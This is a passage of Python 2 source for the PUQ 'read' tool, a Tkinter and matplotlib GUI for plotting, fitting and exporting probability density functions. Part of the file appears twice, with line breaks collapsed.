pyfile.write(repr(self.pdf)) elif ext == 'json': with open(filename, 'wb') as jfile: jfile.write(pickle(self.pdf)) def min_changed(self, newmin): if newmin != '': newmin = float(newmin) if newmin != self.min: self.changed(min=newmin) def max_changed(self, newmax): if newmax != '': newmax = float(newmax) if newmax != self.max: self.changed(max=newmax) class PdfFrameComplex(PdfFrame): def __init__(self, parent, obj, plotframe, nb=None, color=None, desc=None): #print "PdfFrameComplex Init" self.plotframe = plotframe self.a = plotframe.get_plot() self.nb = nb if nb: self.tnum = color color = self.get_color(color) bframe = Frame(parent) lframe = Frame(bframe) rframe = Frame(bframe) self.show = IntVar(value=1) self.bars = IntVar(value=0) cframe = LabelFrame(bframe) # add color selector and show to details if nb: if desc: tframe = Frame(bframe) Label(tframe, text=desc, font=Font(weight="bold")).pack(side=TOP, fill=BOTH, expand=1) c1 = Checkbutton(cframe, variable=self.show, command=self.cb, pady=5, text='Show') c1.pack(fill=BOTH, expand=1) ToolTip(c1, follow_mouse=1, text='Show Plot') img = sq_image(color) self.clab = Label(cframe, image=img) self.clab.photo = img self.clab.bind("<Button-1>", self.popup) self.clab.pack(fill=BOTH, expand=1) ToolTip(self.clab, follow_mouse=1, text='Select Plot Color') c2 = Checkbutton(cframe, variable=self.bars, command=self.cb, pady=5, text='Bars') c2.pack(fill=BOTH, expand=1) ToolTip(c2, follow_mouse=1, text='Show Histogram Bars') cp = ColorPop(self.clab, callback=self.color_changed) if isinstance(obj, PDF): self.par = None self.pdf = obj else: self.pdf = obj.pdf self.par = obj self.data = self.pdf.data self.fit = False kde = gaussian_kde(self.data) bw = kde.factor self.bw = None iqr = scipy.stats.scoreatpercentile(self.data, 75) - scipy.stats.scoreatpercentile(self.data, 25) if iqr == 0.0: self.nbins=50 else: self.nbins = int((np.max(self.data) - np.min(self.data)) / (2*iqr/len(self.data)**(1.0/3)) + .5) self.nbins = max(2, self.nbins) self.min = None self.max = None pdf = self.pdf self.color = color if self.bars.get(): self.line1 = self.a.hist(self.data, self.nbins, normed=1, facecolor=self.color, alpha=0.2) if self.show.get(): self.line2, = self.a.plot(pdf.x, pdf.y, color=color, linewidth=3) # BOTTOM RIGHT - FIT FRAME fitframe = LabelFrame(rframe, text="FIT") RB(fitframe, ["Gaussian", "Linear"], val=self.fit, callback=self.fit_changed) # Bandwidth frame bwframe = LabelFrame(fitframe, text='Bandwidth', padx=5, pady=5) res = 10**round(math.log(bw/100.0, 10)) r1 = round(bw / 10.0) if r1 == 0.0: r1 += res r2 = round(bw * 10.0) self.bwscale = Scale(bwframe, from_=r1, to=r2, orient=HORIZONTAL, resolution=res, showvalue=0, command=self.bw_changed) self.bwscale.set(bw) self.bwscale.config(command=self.bw_changed) self.bwe = Entry(bwframe, width=5) self.bwe.bind('<Return>', self.bw_changed) self.bwe.pack(side=LEFT) self.bwscale.set(bw) self.bwe.delete(0, END) self.bwe.insert(0, "%.3g" % bw) self.bwscale.pack(fill=BOTH, expand=True, side=LEFT) # Bin frame binframe = LabelFrame(fitframe, text='Bins', padx=5, pady=5) self.binscale = Scale(binframe, from_=2, to=100, orient=HORIZONTAL, resolution=1, showvalue=0) self.binscale.set(self.nbins) self.binscale.config(command=self.bins_changed) self.bine = Entry(binframe, width=5) self.bine.bind('<Return>', self.bins_changed) self.bine.pack(side=LEFT) self.bine.delete(0, END) self.bine.insert(0, str(self.nbins)) self.binscale.pack(fill=BOTH, expand=True, side=LEFT) bwframe.pack(side=TOP, fill=BOTH, expand=True) binframe.pack(side=TOP, fill=BOTH, expand=True) self.bwscale.config(state='disabled') self.bwe.config(state='disabled') fitframe.pack(side=RIGHT, fill=BOTH, expand=1) # Bottom Left Frame fdata = LabelFrame(lframe, text='Raw Data', padx=5, pady=5) f1 = Frame(fdata) f2 = Frame(fdata) MyLabel(f1, "Mean", '%.3g' % np.mean(self.data)).frame.pack(side=LEFT, padx=5) MyLabel(f1, "Dev", '%.3g' % np.std(self.data)).frame.pack(side=LEFT, padx=5) MyLabel(f2, "Min", '%.3g' % np.min(self.data)).frame.pack(side=LEFT, padx=5) MyLabel(f2, "Max", '%.3g' % np.max(self.data)).frame.pack(side=LEFT, padx=5) fpdf = LabelFrame(lframe, text='Fitted PDF', padx=5, pady=5) f1.pack(side=TOP, pady = 5, padx = 10, fill=BOTH) f2.pack(side=TOP, pady = 5, padx = 10, fill=BOTH) f1 = Frame(fpdf) f2 = Frame(fpdf) self.entry_min = MyEntry(f2, "Min", StringVar(), '%.3g' % pdf.range[0], callback=self.min_changed) self.entry_max = MyEntry(f2, "Max", StringVar(), '%.3g' % pdf.range[1], callback=self.max_changed) self.label_mean = MyLabel(f1, "Mean", '%.3g' % pdf.mean) self.label_dev = MyLabel(f1, "Dev", '%.3g' % pdf.dev) self.label_mode = MyLabel(f1, "Mode", '%.3g' % pdf.mode) for lab in [self.label_mean, self.label_dev, self.label_mode]: lab.frame.pack(side=LEFT, padx=5) f1.pack(side=TOP, pady = 5, padx = 10, fill=BOTH) f2.pack(side=TOP, pady = 5, padx = 10, fill=BOTH) fdata.pack(side=TOP, fill=BOTH) fpdf.pack(side=TOP, fill=BOTH) if nb and desc: tframe.pack(side=TOP, fill=BOTH, expand=0) cframe.pack(side=LEFT, fill=BOTH, expand=0) lframe.pack(side=LEFT, fill=BOTH, expand=1) rframe.pack(side=RIGHT, fill=BOTH, expand=1) bframe.pack(side=TOP, fill=BOTH, expand=1) def changed(self, fit=None, min=None, max=None, nbins=None, bw=None): #print 'PDF CHANGED %s %s %s %s %s' % (fit, min, max, nbins, bw) if fit != None: self.fit = fit self.binscale.config(state='normal') self.bine.config(state='normal') if self.fit == 'Linear': state = 'disabled' else: state = 'normal' self.bwscale.config(state=state) self.bwe.config(state=state) if min != None: if min == '': self.min = None else: self.min = min if max != None: if max == '': self.max = None else: self.max = max if nbins != None: self.nbins = nbins if bw != None: self.bw = bw if fit != None or bw != None or (self.fit == 'Linear' and nbins != None): self.pdf = ExperimentalPDF(self.data, fit=self.fit, nbins=self.nbins, bw=self.bw, min=self.min, max=self.max, force=1) try: self.line2.remove() except: pass try: for patch in self.line1[2]: patch.remove() except: pass self.a.relim() if self.bars.get(): self.line1 = self.a.hist(self.data, self.nbins, normed=1, facecolor=self.color, alpha=0.2) if self.show.get(): self.line2, = self.a.plot(self.pdf.x, self.pdf.y, self.color, linewidth=3) self.plotframe.update() self.entry_min.update('%.3g' % self.pdf.range[0]) self.entry_max.update('%.3g' % self.pdf.range[1]) self.label_mean.update('%.3g' % self.pdf.mean) self.label_dev.update('%.3g' % self.pdf.dev) self.label_mode.update('%.3g' % self.pdf.mode) def bins_changed(self, val): if isinstance(val, Event): val = int(self.bine.get()) else: val = int(val) if val != self.nbins: #print "bins_changed", val self.bine.delete(0, END) self.bine.insert(0, str(val)) self.changed(nbins=val) def bw_changed(self, val): if isinstance(val, Event): val = self.bwe.get() try: val = float(val) except: if val != 'silverman': val = None kde = gaussian_kde(self.data, bw_method=val) val = kde.factor self.bwscale.set(val) else: val = float(val) if val != self.bw: #print "BW changed from %s to %s" % (self.bw, val) if self.bw == None: self.bw = val else: self.bwe.delete(0, END) self.bwe.insert(0, "%.3g" % val) self.changed(bw=val) def fit_changed(self, val): if val != self.fit: self.changed(fit=val) def cb(self): self.changed() def color_changed(self, color): self.color = color self.changed() if self.nb: self.nb.tab(self.tnum,image=sq_image(color)) self.clab.config(image=sq_image(color)) def popup(self, event): print 'popup' self.menu.post(event.x_root, event.y_root) class ColorPop: def __init__(self, parent, callback): self.callback = callback # create a popup menu self.aMenu = Menu(root, tearoff=0) for color in sq_colors: self.aMenu.add_command(image=sq_image(color), command=lambda c=color: self.callback(c)) # attach popup to frame parent.bind("<Button-1>", self.popup) def popup(self, event): self.aMenu.post(event.x_root, event.y_root) class PdfFrameSimple(PdfFrame): def __init__(self, parent, obj, plotframe, nb=None, color=None, desc=None): #print "PdfFrameSimple Init" self.plotframe = plotframe self.a = plotframe.get_plot() self.nb = nb if nb: self.tnum = color color = self.get_color(color) bframe = Frame(parent) lframe = Frame(bframe, bd=1) rframe = Frame(bframe) self.show = IntVar(value=1) if nb: if desc: tframe = Frame(bframe) Label(tframe, text=desc, font=Font(weight="bold")).pack(fill=X, expand=1) tframe.pack(side=TOP, fill=X, expand=0) c = Checkbutton(lframe, variable=self.show, command=self.cb) c.pack() tool1 = ToolTip(c, follow_mouse=1, text='Show Plot') img = sq_image(color) self.clab = Label(lframe, text=' ', image=img) self.clab.photo = img self.clab.bind("<Button-1>", self.popup) cp = ColorPop(self.clab, callback=self.color_changed) tool2 = ToolTip(self.clab, follow_mouse=1, text='Select Plot Color') self.clab.pack(fill=X, expand=1) if isinstance(obj, PDF): self.par = None self.pdf = obj else: self.par = obj self.pdf = obj.pdf self.min = None self.max = None self.pdf_orig = self.pdf self.color = color self.line2, = self.a.plot(self.pdf.x, self.pdf.y, color=self.color, linewidth=3) # BOTTOM RIGHT frame3 = Frame(rframe) if self.par: frame1 = Frame(rframe) MyLabel(frame1, 'Type', self.par.__class__.__name__, bg='white').frame.pack(side=LEFT, padx=5) self.mean = MyLabel(frame3, "Mean", '%.3g' % self.pdf.mean) self.dev = MyLabel(frame3, "Dev", '%.3g' % self.pdf.dev) self.mode = MyLabel(frame3, "Mode", '%.3g' % self.pdf.mode) for lab in [self.mean, self.dev, self.mode]: lab.frame.pack(side=LEFT, padx=5) self.entry_min = MyEntry(frame3, "Min", StringVar(), '%.3g' % self.pdf.range[0], callback=self.min_changed) self.entry_max = MyEntry(frame3, "Max", StringVar(), '%.3g' % self.pdf.range[1], callback=self.max_changed) if self.par: frame1.pack(side=TOP, anchor='nw', fill=BOTH, expand=1) frame3.pack(side=BOTTOM, anchor='nw', fill=BOTH, expand=1) lframe.pack(side=LEFT, fill=X, expand=0) rframe.pack(side=RIGHT, fill=X, expand=1) bframe.pack(side=TOP, fill=X, expand=0) def cb(self): self.changed() def color_changed(self, color): self.color = color self.changed() if self.nb: self.nb.tab(self.tnum,image=sq_image(color)) self.clab.config(image=sq_image(color)) def popup(self, event): self.menu.post(event.x_root, event.y_root) def changed(self, min=None, max=None): #print 'Parameter Changed %s %s' % (min, max) if min != None: if min == '': self.min = None self.pdf = self.pdf_orig else: self.min = min nsamp = options['pdf']['numpart'] x = np.linspace(min, self.pdf.range[1], nsamp) y = np.interp(x, self.pdf_orig.x, self.pdf_orig.y) self.pdf = PDF(x, y) if max != None: if max == '': self.max = None self.pdf = self.pdf_orig else: self.max = max nsamp = options['pdf']['numpart'] x = np.linspace(self.pdf.range[0], max, nsamp) y = np.interp(x, self.pdf_orig.x, self.pdf_orig.y) self.pdf = PDF(x, y) self.mean.update('%.3g' % self.pdf.mean) self.dev.update('%.3g' % self.pdf.dev) self.mode.update('%.3g' % self.pdf.mode) self.entry_min.update('%.3g' % self.pdf.range[0]) self.entry_max.update('%.3g' % self.pdf.range[1]) try: self.line2.remove() except: pass self.a.relim() if self.show.get(): self.line2, = self.a.plot(self.pdf.x, self.pdf.y, color=self.color, linewidth=3) self.plotframe.update() class TimeFrame: def __init__(self, parent): self.tframe = Frame(parent) TimeFrame.me = weakref.proxy(self) def cleanup(self): try: self.tframe.pack_forget() self.canvas._tkcanvas.pack_forget() del self.canvas del self.f except: pass def plot(self, ext): from tkFileDialog import asksaveasfilename filename = asksaveasfilename(title="Plot to file...", initialfile='%s-response' % self.name, defaultextension='.%s' % ext, filetypes=[(ext.upper(), '*.%s' % ext)]) if not filename: return self.canvas.print_figure(filename) def state(self, st, val, path): self.cleanup() if st != 'RESPONSE': return self.name = os.path.basename(path[:-9]) self.f = plt.figure(figsize=(5, 5)) self.canvas = FigureCanvasTkAgg(self.f, master=self.tframe) self.canvas.get_tk_widget().pack(side=TOP, fill=BOTH, expand=1) self.tframe.pack(side=TOP, fill=BOTH, expand=1) self.canvas._tkcanvas.pack(side='top', fill='both', expand=1) if len(val.params) > 2: ax = Axes3D(self.f, azim=30.0, elev=30.0) ax.text2D(0.5, 0.5,'Cannot plot response functions\nwith more than 2 parameters', horizontalalignment='center', verticalalignment='center', transform = ax.transAxes) elif len(val.params) == 2: labels = CB.get('Labels') ax = Axes3D(self.f, azim=30.0, elev=30.0) val.plot(ax=ax, fig=self.f, title=0, labels=labels) else: self.a = self.f.add_subplot(111) self.a.grid(True) val.plot(fig=self.a) class SurFrame: def __init__(self, parent): self.parent = parent def cleanup(self): try: self.surframe.pack_forget() except: pass def rbf_changed(self, rbfunc): global modified #print "rbf changed to ", rbfunc #print self.val.rbf self.val.rbf = rbfunc del h5[self.path] h5[self.path] = pickle(self.val) # invalidate the pdf pdfpath = self.path[:-len('response')] + 'pdf' samplepath = self.path[:-len('response')] + 'samples' varname = self.path.split('/')[-2] if pdfpath in h5: del h5[pdfpath] if samplepath in h5: del h5[samplepath] # change treeview pdf tag to 'generate' for child in MyApp.app.tree.get_children('psweep'): item = MyApp.app.tree.item(child) if item['text'] == varname: for ch in MyApp.app.tree.get_children(child): item = MyApp.app.tree.item(ch) if item['text'] == 'pdf': MyApp.app.tree.item(ch, tags = ['generate']) modified = True MyApp.state_changed('RESPONSE', self.val, self.path) def state(self, st, val, path): self.cleanup() if st != 'RESPONSE': return if isinstance(val, SampledFunc): self.val = val self.surframe = LabelFrame(self.parent, text="Radial Basis Function") rbfvals = [ "multiquadric", "linear", "cubic", "quintic", "inverse", "gaussian" ] self.rbf = MyCombobox(self.surframe, 'RBF', rbfvals, current=val.rbf, callback=self.rbf_changed) else: self.surframe = LabelFrame(self.parent, text="Surface") # Surface Pane self.eqn = ScrolledText.ScrolledText(self.surframe, height=2, ) self.eqn.insert(END, val.eqn) self.eqn.pack(side=TOP, expand=YES, fill=BOTH, padx=5, pady=5) # RMSE rmsep = val.rmse()[1] if rmsep > 10: bgcolor = 'red' elif rmsep > 5: bgcolor = 'orange' elif rmsep > 2: bgcolor = 'yellow' else: bgcolor = '' self.rmse = MyLabel(self.surframe, value='%.3g%%' % rmsep, text='RMSE', bg=bgcolor) self.rmse.frame.pack(side=TOP, anchor='w', padx=5, pady=5) self.surframe.pack(side=LEFT, fill=BOTH, expand=1) class ParFrame: def __init__(self, parent): self.parent = parent def cleanup(self): try: self.parframe.pack_forget() except: pass def state(self, st, val, path): self.cleanup() if st != 'RESPONSE': return self.parframe = Frame(self.parent) self.parframe.pack(side=LEFT, fill=BOTH, expand=1) # Parameters Table with scrollbar scrollbar = Scrollbar(self.parframe) scrollbar.pack(side=RIGHT, fill=Y) t=ttk.Treeview(self.parframe, yscrollcommand=scrollbar.set, height=len(val.params)) t["columns"]=("desc","pdf") t.column("#0", width=75) t.column("desc", width=100) t.column("pdf", width=400) t.heading("#0", text='Name') t.heading("#1", text='Description') t.heading("#2", text='PDF') for p in val.params: cname = p.__class__.__name__[:-9] pdf_str = '%s [%s - %s] mean=%s dev=%s mode=%s' % (cname, p.pdf.range[0], p.pdf.range[1], p.pdf.mean, p.pdf.dev, p.pdf.mode) t.insert("", "end", text=p.name, values=[p.description, pdf_str]) t.tag_configure("ttk") scrollbar.config(command=t.yview) t.pack(side=TOP, fill=BOTH, expand=YES) class MyApp: def __init__(self, parent, objlist): self.parent = parent parent.protocol('WM_DELETE_WINDOW', self.quit) # contains everything self.container = Frame(self.parent) self.container.pack(fill=BOTH, expand=YES) # top frame self.tframe = Frame(self.container) self.bframe = Frame(self.container) detailframe = None plotframe = PlotFrame(self.tframe) if isinstance(objlist, list): cnote = CNote(self.bframe) for cnum, obj in enumerate(objlist): f = Frame(cnote) PdfFactory(f, obj[0], plotframe, nb=cnote, color=cnum, desc=obj[2]) cnote.add(f, color=cnum, text=obj[1], padding=3) cnote.pack(expand=1, fill=BOTH) else: detailframe = PdfFactory(self.bframe, objlist[0], plotframe) MB(parent, plotframe, detailframe) self.tframe.pack(side=TOP, fill=BOTH, expand=YES) self.bframe.pack(side=LEFT, fill=BOTH, expand=YES) def quit(self): global windows wdw = self.parent if wdw in windows: windows.remove(wdw) if not windows: wdw.quit() wdw.destroy() def show_obj(objlist, compare=0): global root, windows root = Tk() root.withdraw() windows = [] if compare: win = Toplevel() windows.append(win) win.title('PUQ Compare') MyApp(win, objlist) else: for i, obj in enumerate(objlist): win = Toplevel() windows.append(win) try: win.title(namelist[i]) except: win.title(obj[2]) MyApp(win, obj) root.mainloop() # loads python file # returns list [(obj, name, desc), (obj, name, desc), ...] def python_load(fname): sys.path = [os.getcwd()] + sys.path module = os.path.splitext(os.path.split(fname)[1])[0] _temp = __import__(module, globals(), locals(), [], 0) pdflist = [] for name, obj in _temp.__dict__.iteritems(): if isinstance(obj, Parameter): desc = obj.description if desc == name: desc = '' pdflist.append((obj, name, "%s: %s (%s)" % (fname, name, desc))) elif isinstance(obj, PDF): pdflist.append((obj, name, "%s: %s" % (fname, name))) if 'run' in _temp.__dict__: def extract_params(uq,b,c): for pm in uq.params: if pm.description and pm.description != pm.name: pdflist.append((pm, pm.name, ('%s: %s (%s)' % (fname, pm.name, pm.description)))) else: pdflist.append((pm, pm.name, ('%s: %s' % (fname, pm.name)))) _temp.Sweep = extract_params _temp.run() if len(pdflist) == 0: print 'Error: Found no PDFs or Parameters in %s' % fname sys.exit(1) if len(pdflist) == 1: return pdflist while 1: print '\nList PDFs you want displayed, separated by commas.' print '\nFound the following PDFs:' for i, p in enumerate(pdflist): print "%d: %s" % (i, p[1]) num = raw_input("Which one(s) to display? (* for all) ") try: if num == '*': numlist = pdflist else: numlist = map(int, num.split(',')) numlist = [pdflist[x] for x in numlist] break except: print 'Invalid number. Try again.\n' return numlist def get_name_desc(obj, loc): if isinstance(obj, Parameter): name = obj.name desc = obj.description else: name = os.path.splitext(loc)[0] desc = '' return name, desc # returns list [(obj, name, desc), (obj, name, desc), ...] def read_obj(loc): name = None desc = None if loc.startswith('http'): try: obj = NetObj(loc) name, desc = get_name_desc(obj, loc) return [(obj, name, desc)] except: print "Error accessing", loc return [] else: extension = loc.split('.')[-1] if extension == 'json': f = open(loc, 'r') obj = unpickle(f.read()) f.close() name, desc = get_name_desc(obj, loc) return [(obj, name, desc)] elif extension == 'py': return python_load(loc) print "Don't know how to open %s." % loc return [] def read(*args): opt, args = parse_args(list(args)) objlist = [] for arg in args: objs = read_obj(arg) objlist.extend(objs) if objlist: show_obj(objlist, compare=opt.c) def parse_args(args): debug(args) usage = "Usage: puq read [options] [object] ...\n\ where 'object' is a URI, python file, or JSON file\n\ Options:\n\ -c Compare. When two or more objects are given, display them in the same plot.\n\ " parser = OptionParser(usage) parser.add_option("-c", action="store_true", help="Compare plots.") (opt, ar) = parser.parse_args(args=args) return opt, ar if __name__ == "__main__": read(*sys.argv[1:])
puq/read.py
import matplotlib matplotlib.use('TkAgg', warn=False) import scipy import numpy as np from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg from matplotlib.figure import Figure from mpl_toolkits.mplot3d import Axes3D from matplotlib import cm import matplotlib.pyplot as plt from Tkinter import * from tkFont import Font import ttk import ScrolledText import sys, os, weakref, copy from urlparse import urlparse, urlunsplit import h5py from puq import Parameter, PDF, ExperimentalPDF, options, pickle, unpickle, NetObj, gaussian_kde, SampledFunc import math import webbrowser, shutil, atexit, shelve import logging from logging import info, debug, exception, warning, critical from optparse import OptionParser from cnote import CNote, sq_colors, sq_image from tooltip import ToolTip class MyCombobox: def __init__(self, parent, txt, values, current, callback=None): self.var = StringVar() self.var.set(current) self.callback = callback self.cb = ttk.Combobox(parent, textvariable=self.var, values=values) self.cb.bind('<<ComboboxSelected>>', self.changed) self.cb.pack(side=TOP, padx=5, pady=5, anchor='w') def changed(self, event): #print "combobox changed to %s" % (self.var.get()) if self.callback: self.callback(self.var.get()) def state(self, st, path): self.cb.config(state=st) class MyLabel: def __init__(self, parent, text, value, bg=''): self.frame = Frame(parent, background='black', bd=1) if bg: self.label = Label(self.frame, text=value, bg=bg) else: self.label = Label(self.frame, text=value) self.desc = Label(self.frame, text=text) self.desc.pack(side=LEFT, anchor='w') self.label.pack(side=LEFT, anchor='w') def update(self, val): self.label.config(text=val) # radiobutton class RB: RB_list= [] def __init__(self, parent, values, val, callback=None): self.callback = callback RB.RB_list.append(weakref.proxy(self)) self.var = StringVar() self.var.set(val) for txt in values: b = Radiobutton(parent, text=txt, variable=self.var, value=txt, command=self.changed) b.pack(side=TOP, padx=5, pady=5, anchor='w') def changed(self): #print "RB changed to %s" % (self.var.get()) if self.callback: self.callback(self.var.get()) else: MyApp.state_changed() def state(self, st): self.cb.config(state=st) @staticmethod def get(name): for n in RB.RB_list: if name == n.txt: return n.var.get() class MyEntry: def __init__(self, parent, txt, var, val, callback=None): self.callback = callback self.var = var self.var.set(val) Label(parent, text=txt).pack(side=LEFT) self.entry = Entry(parent, textvariable=self.var, width=10) self.entry.bind('<Return>', self.changed) self.entry.pack(side=LEFT, padx=5, anchor='w') def changed(self, entry): #print "Entry changed to %s" % (self.var.get()) if self.callback: self.callback(self.var.get()) else: MyApp.state_changed() def state(self, st): self.cb.config(state=st) def update(self, val): self.var.set(val) class MB: def __init__(self, parent, plotframe, dframe): menubar = Menu(parent) parent['menu'] = menubar filemenu = Menu(menubar, tearoff=0) menubar.add_cascade(label="File", menu=filemenu) #filemenu.add_command(label="Upload", command=ask_upload) #filemenu.add_separator() #filemenu.add_command(label="Preferences", command=preferences) #filemenu.add_separator() filemenu.add_command(label="Quit", command=root.quit) self.exportmenu = Menu(menubar, tearoff=0) menubar.add_cascade(label="Export", menu=self.exportmenu) if dframe == None: self.exportmenu.add_command(label="Copy PDF to Clipboard", state=DISABLED) self.exportmenu.add_command(label="Export PDF as JSON", state=DISABLED) self.exportmenu.add_command(label="Export PDF to CSV file", state=DISABLED) else: self.exportmenu.add_command(label="Copy PDF to Clipboard", command=dframe.copy_clip, state=NORMAL) self.exportmenu.add_command(label="Export PDF as JSON", command=lambda: dframe.export_pdf('json'), state=NORMAL) self.exportmenu.add_command(label="Export PDF to CSV file", command=lambda: dframe.export_pdf('csv'), state=NORMAL) self.exportplot = Menu(self.exportmenu, tearoff=0) self.exportmenu.add_cascade(label="Plot to", menu=self.exportplot) fig = plt.figure() sup = fig.canvas.get_supported_filetypes() keys = sup.keys() keys.sort() for key in keys: lab = '%s : %s' % (key.upper(), sup[key]) self.exportplot.add_command(label=lab, command = lambda key=key: plotframe.plot(key)) helpmenu = Menu(menubar, tearoff=0) helpmenu.add_command(label="About", command=self.about) helpmenu.add_command(label="Online Help", command=self.open_help) menubar.add_cascade(label="Help", menu=helpmenu) parent.config(menu=menubar) def open_help(self): webbrowser.open('http://memshub.org/site/memosa_docs/puq/index.html') def about(self): from tkMessageBox import showinfo showinfo(message=__doc__, title='ABOUT') class ResponseFrame: def __init__(self, parent): self.tframe = Frame(parent) ResponseFrame.me = weakref.proxy(self) def cleanup(self): try: self.tframe.pack_forget() self.canvas._tkcanvas.pack_forget() del self.canvas del self.f except: pass def plot(self, ext): from tkFileDialog import asksaveasfilename filename = asksaveasfilename(title="Plot to file...", initialfile='%s-response' % self.name, defaultextension='.%s' % ext, filetypes=[(ext.upper(), '*.%s' % ext)]) if not filename: return self.canvas.print_figure(filename) def state(self, st, val, path): self.cleanup() if st != 'RESPONSE': return self.name = os.path.basename(path[:-9]) self.f = plt.figure(figsize=(5, 5)) self.canvas = FigureCanvasTkAgg(self.f, master=self.tframe) self.canvas.get_tk_widget().pack(side=TOP, fill=BOTH, expand=1) self.tframe.pack(side=TOP, fill=BOTH, expand=1) self.canvas._tkcanvas.pack(side='top', fill='both', expand=1) if len(val.params) > 2: ax = Axes3D(self.f, azim=30.0, elev=30.0) ax.text2D(0.5, 0.5,'Cannot plot response functions\nwith more than 2 parameters', horizontalalignment='center', verticalalignment='center', transform = ax.transAxes) elif len(val.params) == 2: labels = CB.get('Labels') ax = Axes3D(self.f, azim=30.0, elev=30.0) val.plot(ax=ax, fig=self.f, title=0, labels=labels) else: self.a = self.f.add_subplot(111) self.a.grid(True) val.plot(fig=self.a) class PlotFrame: def __init__(self, parent): self.parent = parent # TOP FRAME - CANVAS self.f = plt.figure(figsize=(5, 5)) self.a = self.f.add_subplot(111) self.a.grid(True) #self.a.set_xlabel(self.description) self.a.set_ylabel("Probability") self.canvas = FigureCanvasTkAgg(self.f, master=parent) self.canvas.get_tk_widget().pack(side=TOP, fill=BOTH, expand=1) self.canvas._tkcanvas.pack(side='top', fill='both', expand=1) def update(self): self.canvas.draw() def get_plot(self): return self.a def plot(self, ext): from tkFileDialog import asksaveasfilename name = 'puq-plot' filename = asksaveasfilename(title="Plot to file...", initialfile=name, defaultextension='.%s' % ext, filetypes=[(ext.upper(), '*.%s' % ext)]) if not filename: return self.canvas.print_figure(filename) def PdfFactory(frame, obj, plotframe, nb=None, color=None, desc=None): state = None if isinstance(obj, PDF): if hasattr(obj, 'data'): state = 'PDF' else: state = 'PDF2' elif isinstance(obj, Parameter): if hasattr(obj.pdf, 'data'): state = 'PDF' else: state = 'PDF2' if state == 'PDF': return PdfFrameComplex(frame, obj, plotframe, nb=nb, color=color, desc=desc) if state == 'PDF2': return PdfFrameSimple(frame, obj, plotframe, nb=nb, color=color, desc=desc) print 'FACTORY RETURNING NONE' return None class PdfFrame: def get_color(self, color): if color == None: color = 'blue' elif isinstance(color, int): color = sq_colors[color] return color def copy_clip(self): root.clipboard_clear() root.clipboard_append(pickle(self.pdf)) def export_pdf(self, ext): # Dump pdf as csv, json, or python import csv from tkFileDialog import asksaveasfilename if self.par: name = '%s-pdf' % self.par.name else: name = 'PDF' extension = '.'+ext filetypes = [(ext.upper(), '*.%s' % ext)] filename = asksaveasfilename(title="Save PDF to CSV file...", initialfile=name, defaultextension=extension, filetypes=filetypes) if not filename: return if ext == 'csv': with open(filename, 'wb') as csvfile: spamwriter = csv.writer(csvfile) for x, prob in np.column_stack((self.pdf.x, self.pdf.y)): spamwriter.writerow([x, prob]) m = "Wrote %s pairs of (value, probability) data to '%s'.\n" % (len(self.pdf.x), filename) t = Toplevel(self.parent) t.title("Wrote CSV File") msg = Message(t, text=m, width=500) button = Button(t, text="OK", command=t.destroy) button.pack(side=BOTTOM) msg.pack(fill=BOTH, expand=1) elif ext == 'py': with open(filename, 'wb') as pyfile: pyfile.write(repr(self.pdf)) elif ext == 'json': with open(filename, 'wb') as jfile: jfile.write(pickle(self.pdf)) def min_changed(self, newmin): if newmin != '': newmin = float(newmin) if newmin != self.min: self.changed(min=newmin) def max_changed(self, newmax): if newmax != '': newmax = float(newmax) if newmax != self.max: self.changed(max=newmax) class PdfFrameComplex(PdfFrame): def __init__(self, parent, obj, plotframe, nb=None, color=None, desc=None): #print "PdfFrameComplex Init" self.plotframe = plotframe self.a = plotframe.get_plot() self.nb = nb if nb: self.tnum = color color = self.get_color(color) bframe = Frame(parent) lframe = Frame(bframe) rframe = Frame(bframe) self.show = IntVar(value=1) self.bars = IntVar(value=0) cframe = LabelFrame(bframe) # add color selector and show to details if nb: if desc: tframe = Frame(bframe) Label(tframe, text=desc, font=Font(weight="bold")).pack(side=TOP, fill=BOTH, expand=1) c1 = Checkbutton(cframe, variable=self.show, command=self.cb, pady=5, text='Show') c1.pack(fill=BOTH, expand=1) ToolTip(c1, follow_mouse=1, text='Show Plot') img = sq_image(color) self.clab = Label(cframe, image=img) self.clab.photo = img self.clab.bind("<Button-1>", self.popup) self.clab.pack(fill=BOTH, expand=1) ToolTip(self.clab, follow_mouse=1, text='Select Plot Color') c2 = Checkbutton(cframe, variable=self.bars, command=self.cb, pady=5, text='Bars') c2.pack(fill=BOTH, expand=1) ToolTip(c2, follow_mouse=1, text='Show Histogram Bars') cp = ColorPop(self.clab, callback=self.color_changed) if isinstance(obj, PDF): self.par = None self.pdf = obj else: self.pdf = obj.pdf self.par = obj self.data = self.pdf.data self.fit = False kde = gaussian_kde(self.data) bw = kde.factor self.bw = None iqr = scipy.stats.scoreatpercentile(self.data, 75) - scipy.stats.scoreatpercentile(self.data, 25) if iqr == 0.0: self.nbins=50 else: self.nbins = int((np.max(self.data) - np.min(self.data)) / (2*iqr/len(self.data)**(1.0/3)) + .5) self.nbins = max(2, self.nbins) self.min = None self.max = None pdf = self.pdf self.color = color if self.bars.get(): self.line1 = self.a.hist(self.data, self.nbins, normed=1, facecolor=self.color, alpha=0.2) if self.show.get(): self.line2, = self.a.plot(pdf.x, pdf.y, color=color, linewidth=3) # BOTTOM RIGHT - FIT FRAME fitframe = LabelFrame(rframe, text="FIT") RB(fitframe, ["Gaussian", "Linear"], val=self.fit, callback=self.fit_changed) # Bandwidth frame bwframe = LabelFrame(fitframe, text='Bandwidth', padx=5, pady=5) res = 10**round(math.log(bw/100.0, 10)) r1 = round(bw / 10.0) if r1 == 0.0: r1 += res r2 = round(bw * 10.0) self.bwscale = Scale(bwframe, from_=r1, to=r2, orient=HORIZONTAL, resolution=res, showvalue=0, command=self.bw_changed) self.bwscale.set(bw) self.bwscale.config(command=self.bw_changed) self.bwe = Entry(bwframe, width=5) self.bwe.bind('<Return>', self.bw_changed) self.bwe.pack(side=LEFT) self.bwscale.set(bw) self.bwe.delete(0, END) self.bwe.insert(0, "%.3g" % bw) self.bwscale.pack(fill=BOTH, expand=True, side=LEFT) # Bin frame binframe = LabelFrame(fitframe, text='Bins', padx=5, pady=5) self.binscale = Scale(binframe, from_=2, to=100, orient=HORIZONTAL, resolution=1, showvalue=0) self.binscale.set(self.nbins) self.binscale.config(command=self.bins_changed) self.bine = Entry(binframe, width=5) self.bine.bind('<Return>', self.bins_changed) self.bine.pack(side=LEFT) self.bine.delete(0, END) self.bine.insert(0, str(self.nbins)) self.binscale.pack(fill=BOTH, expand=True, side=LEFT) bwframe.pack(side=TOP, fill=BOTH, expand=True) binframe.pack(side=TOP, fill=BOTH, expand=True) self.bwscale.config(state='disabled') 